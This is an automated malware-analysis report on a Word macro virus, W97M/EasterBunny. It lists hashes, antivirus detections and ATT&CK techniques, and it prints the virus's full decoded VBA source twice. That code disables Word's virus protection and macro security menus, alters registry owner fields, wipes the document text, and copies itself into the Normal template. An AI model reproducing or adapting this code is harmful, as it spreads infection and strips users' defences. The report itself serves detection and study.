W97M/EasterBunny Office (OLE) malware analysis — malicious · 3aa3a972c458523a

MALICIOUS

Office (OLE)

36.5 KB Created: 2000-08-09 13:51:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 1980b333da57f0118d8f33b757cc7976 SHA-1: 8c61af27a7ec841fee0c9c1a649c2e5adac9f379 SHA-256: 3aa3a972c458523a3aeb0bfcc2d5ee31fd4396f2e3b4c4d4db0deaffc4414fad

120 Risk Score

Malware Insights

W97M/EasterBunny · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.Chameleon-12', and it contains VBA macros, including a 'Document_Open' macro. The VBA script, identified as 'W97M/EasterBunny', attempts to display a message box and likely performs other malicious actions upon document opening, consistent with a macro-based trojan.

Heuristics 3

ClamAV: Doc.Trojan.Chameleon-12 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Chameleon-12
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12058 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12058 bytes
SHA-256: `1155691a05ce255dc3796e47e49f09097ec911f28e709f8b1c1519e70b427639`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Easter_Bunny() ' W97M/Easter Bunny: by Total Konfuzion ' Should spread under Word2000 ' Greetingz from the Easter Bunny On Error Resume Next Dim BlankLine If ActiveDocument.Name <> "EB.doc" Then Options.BlueScreen = (Rnd * 0) + 1 With Selection .HomeKey unit:=wdStory .EndKey unit:=wdStory, Extend:=wdExtend .Delete unit:=wdCharacter, Count:=(Rnd * 0) + 1 End With With Selection .ParagraphFormat.Alignment = wdAlignParagraphCenter .Font.Name = "Arial" .Font.Bold = (Rnd * 0) + 1 .Font.Size = (Rnd * 0) + 20 For BlankLine = 1 To 8 Selection.TypeParagraph Next BlankLine .TypeText Text:="()...()" .TypeParagraph .TypeText Text:="( ' = ' )" .TypeParagraph .TypeText Text:="(''')(''')" For BlankLine = 1 To 3 Selection.TypeParagraph Next BlankLine .Font.Name = "Comic Sans MS" .TypeText Text:="Happy Easter from the Easter Bunny.. !!" .Font.Bold = (Rnd * 0) .HomeKey unit:=wdStory End With End If End Sub Private Sub Document_Open() On Error Resume Next If Day(Now) = Minute(Now) Then MsgBox "Your system is infected with the Easter Bunny virus. >8)", vbExclamation + vbSystemModal, "W97M/EasterBunny" With Options .VirusProtection = (Rnd * 0) .SaveNormalPrompt = (Rnd * 0) .ConfirmConversions = (Rnd * 0) End With With System .PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOwner") = "Total Konfuzion >8)" .PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOrganization") = "W97M/EasterBunny""" End With If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Security\", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = (Rnd * 0) Else CommandBars("Tools").Controls("Macro").Enabled = (Rnd * 0) CommandBars("Tools").Controls("Templates and Add-ins...").Enabled = (Rnd * 0) CommandBars("Format").Controls("Style Gallery...").Enabled = (Rnd * 0) End If With Application .EnableCancelKey = wdCancelDisabled .UserName = "Total Konfuzion" .UserInitials = "TD" .UserAddress = "W97M/EasterBunny" End With Call Easter_Bunny System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "W97M/EasterBunny") = "by Total Konfuzion >8)" If ThisDocument = ActiveDocument Then Set Infect = NormalTemplate Else Set Infect = ActiveDocument EB = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines) Set Dest = Infect.VBProject.VBComponents.Item(1).CodeModule Dest.DeleteLines 1, Dest.CountOfLines Dest.AddFromString EB If Infect = ActiveDocument Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument End Sub Sub HelpAbout() MsgBox " « ¤ ° = Easter Bunny virus.. !! = ° ¤ »" + Chr(10) + "-------------------------------------------------------------" + Chr(10) + Chr(10) + " -Total Konfuzion-", vbInformation + vbSystemModal, "Happy Easter from the.." Dialogs(wdDialogHelpAbout).Show End Sub ' Processing file: /opt/analyzer/scan_staging/534a9e95510f4e4bb75815b88386618a.bin ' =========================================================================== ... (truncated)

SHA-256: 1155691a05ce255dc3796e47e49f09097ec911f28e709f8b1c1519e70b427639

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Easter_Bunny()
' W97M/Easter Bunny: by Total Konfuzion
' Should spread under Word2000
' Greetingz from the Easter Bunny

    On Error Resume Next
    
    Dim BlankLine
    
    If ActiveDocument.Name <> "EB.doc" Then
        Options.BlueScreen = (Rnd * 0) + 1
        
        With Selection
            .HomeKey unit:=wdStory
            .EndKey unit:=wdStory, Extend:=wdExtend
            .Delete unit:=wdCharacter, Count:=(Rnd * 0) + 1
        End With
        
        With Selection
            .ParagraphFormat.Alignment = wdAlignParagraphCenter
            .Font.Name = "Arial"
            .Font.Bold = (Rnd * 0) + 1
            .Font.Size = (Rnd * 0) + 20
            For BlankLine = 1 To 8
                Selection.TypeParagraph
            Next BlankLine
            .TypeText Text:="()...()"
            .TypeParagraph
            .TypeText Text:="( ' = ' )"
            .TypeParagraph
            .TypeText Text:="(''')(''')"
            For BlankLine = 1 To 3
                Selection.TypeParagraph
            Next BlankLine
            .Font.Name = "Comic Sans MS"
            .TypeText Text:="Happy Easter from the Easter Bunny.. !!"
            .Font.Bold = (Rnd * 0)
            .HomeKey unit:=wdStory
        End With
    End If
End Sub
Private Sub Document_Open()
    On Error Resume Next
    
    If Day(Now) = Minute(Now) Then MsgBox "Your system is infected with the Easter Bunny virus.   >8)", vbExclamation + vbSystemModal, "W97M/EasterBunny"
    
    With Options
        .VirusProtection = (Rnd * 0)
        .SaveNormalPrompt = (Rnd * 0)
        .ConfirmConversions = (Rnd * 0)
    End With
    
    With System
        .PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOwner") = "Total Konfuzion   >8)"
        .PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOrganization") = "W97M/EasterBunny"""
    End With
    
    If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Security\", "Level") <> "" Then
        CommandBars("Macro").Controls("Security...").Enabled = (Rnd * 0)
    Else
        CommandBars("Tools").Controls("Macro").Enabled = (Rnd * 0)
        CommandBars("Tools").Controls("Templates and Add-ins...").Enabled = (Rnd * 0)
        CommandBars("Format").Controls("Style Gallery...").Enabled = (Rnd * 0)
    End If
    
    With Application
        .EnableCancelKey = wdCancelDisabled
        .UserName = "Total Konfuzion"
        .UserInitials = "TD"
        .UserAddress = "W97M/EasterBunny"
    End With
    
    Call Easter_Bunny
    
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "W97M/EasterBunny") = "by Total Konfuzion   >8)"
    
    If ThisDocument = ActiveDocument Then Set Infect = NormalTemplate Else Set Infect = ActiveDocument
    
    EB = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
    
    Set Dest = Infect.VBProject.VBComponents.Item(1).CodeModule
    Dest.DeleteLines 1, Dest.CountOfLines
    Dest.AddFromString EB
    
    If Infect = ActiveDocument Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End Sub
Sub HelpAbout()
    MsgBox " « ¤ ° =  Easter Bunny virus.. !!  = ° ¤ »" + Chr(10) + "-------------------------------------------------------------" + Chr(10) + Chr(10) + "         -Total Konfuzion-", vbInformation + vbSystemModal, "Happy Easter from the.."
    Dialogs(wdDialogHelpAbout).Show
End Sub



' Processing file: /opt/analyzer/scan_staging/534a9e95510f4e4bb75815b88386618a.bin
' ===========================================================================
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.